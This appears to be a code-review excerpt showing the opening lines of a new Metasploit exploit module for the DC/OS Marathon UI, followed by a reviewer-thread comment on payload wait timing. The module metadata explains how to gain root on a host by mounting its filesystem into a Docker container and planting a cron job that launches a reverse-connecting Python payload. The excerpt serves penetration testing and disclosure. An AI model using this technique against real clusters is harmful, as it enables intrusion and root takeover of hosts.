modules/exploits/linux/http/dcos_marathon.rb

```diff
@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DC/OS Marathon UI Docker Exploit',
+      'Description'    => %q{
+        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
+        a docker container with the '/' path mounted with read/write
+        permissions on the host server that is running the docker container.
+        As the docker container excutes command as uid 0 it is honored
+        by the host operating system allowing the attacker to edit/create
+        files owed by root. This exploit abuses this to creates a cron job
+        in the '/etc/cron.d/' path of the host server.
+
+        *Notes: The docker image must be a valid docker image from
+        hub.docker.com. Further more the docker container will only
+        deploy if there are resources available in the DC/OS cluster.
+      },
+      'Author'         => 'Erik Daguerre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
+      ],
+      'Payload'        =>
+        {
+          'DisableNops'=> true,
+        },
+      'Targets'            => [
+        [ 'Python', {
+            'Platform'   => 'python',
+            'Arch'       => ARCH_PYTHON,
+            'Payload'    => {
+              'Compat'   => {
+                'ConnectionType' => 'reverse noconn none tunnel'
+              }
+            }
+          }
+        ]
+      ],
+      'DefaultOptions' => { 'WfsDelay' => 75 },
```

Comment:
Waiting the for the docker image to deploy wait is based on the `WAIT_TIMEOUT` option, which can be adjusted by the user. I have tested and verified the `WfsDelay` kicks in once the module is doing running and waiting for the session to call back starts. As it is a cron job, it should take no more 60 secs, Setting it at 75 allows for latency.